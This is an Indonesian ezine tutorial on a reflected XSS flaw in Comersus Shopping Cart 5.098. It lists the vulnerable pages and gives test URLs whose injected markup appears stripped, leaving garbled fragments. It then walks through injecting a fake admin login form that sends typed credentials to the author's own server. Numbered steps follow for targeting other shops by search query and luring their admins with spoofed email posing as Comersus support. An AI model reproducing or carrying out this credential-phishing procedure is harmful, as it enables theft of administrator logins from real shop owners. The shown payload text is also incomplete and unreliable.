____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID Author : az001 || az001@plasa.com || az001@cornets.net || az001@telkom.net Online @ www.echo.or.id :: http://ezine.echo.or.id == Comersus Shopping Cart 5.098 XSS Vulnerability == Cross Site Scripting atau lebih dikenal dengan XSS merupakan salah satu teknik yang dipakai untuk "mengakali" sebuah aplikasi web. Baru-baru ini saya menemukan adanya kelemahan pada Comersus Shopping Cart,sebuah aplikasi shopping cart yang berbasis ASP. Versi Comersus : 5.098 ( Terbaru ) dan sebelumnya Kelemahannya ada di halaman ini : /store/comersus_message.asp /backofficeLite/comersus_backoffice_message.asp Contoh ,untuk mengecek vulnerability: http://az001/comersus/store/comersus_message.asp?message=

Vulnerable

http://az001/comersus/backofficeLite/comersus_backoffice_message.asp?message=

Vulnerable

Hanya itu saja ????? TIDAK , kita bisa melakukan hal lain ,namun sebelum itu kita buat dulu file yang kita namakan ambilcom.php dan letakkan di server kita(http://mysite.org),sebenarnya bisa menggunakan bahasa yang lain ,itu terserah anda: Masukkan url berikut di browser anda: http://az001/comersus/backofficelite/comersus_backoffice_message.asp?message=

BackOffice%20Lite

User

Password

Nah lihat apa yang terjadi muncul form login , coba isi username+passwordnya terserah anda dan klik submit .... ,apa yang terjadi ? muncul pesan : Your authentication data is incorrect... Tidak apa -apa itu hanyalah pesan bohong semata , coba lihat di server anda (http://mysite.org/comersus.txt) Wow ... ada username+password yang kita masukkan tadi :: Bagaimana "mengerjai" situs lain ? 1. Cari target di google ,keyword : powered by comersus 2. Setelah menemukan target, enter url http://www.targetnya.com/comersus/store/comersus_contactUs.asp 3. Catat email situs tersebut 4. Lalu kirim fake/anonymous email(dalam format html) ke situs tsb,misal admin@target.net yang isinya terserah anda yang penting agar pengelola tersebut tertarik untuk membaca dan "mengklik" url yang kita berikan . Ingat kita mengirim email dari ,misal support@comersus.com Misal : blablablablabla..................... ,click here for login 5. Tunggu admin itu membaca dan mengklik url tersebut,lihat terus perkembangannya di http://mysite.org/comersus.txt Jika admin itu sudah login dari url yang kita berikan,file itu akan berisi user+password admin tsb Tulisan ini dibuat agar bermanfaat bagi kita semua terutama para pengelola situs agar tidak mudah percaya pada aplikasi yang dibuat oleh "orang luar",mengapa ? Karena kita bisa buat sendiri dan bisa lebih baik dari produk mereka Jika ada yang menemukan tutorial yang serupa/semacam ini (Vulnerability COmersus 5.098) di situs lain dengan penulis yang berbeda, mungkin penulis itu telah lebih dulu menemukan vulnerability ini ,............. sialan telat lagi donk gw .. Kritik dan Kritik atau (mungkin) pujian saya akan terima agar tutorial yang saya buat lebih baik lagi Thanks to : Seviour , Ojjan (lysix44), ewied00,KISS ,Baghdad,Bajak Laut ,yang mau Pembaca Referensi : Web Apllication Security and Defense in Depth Security Checklist Phil Janzen Sans Institute,2004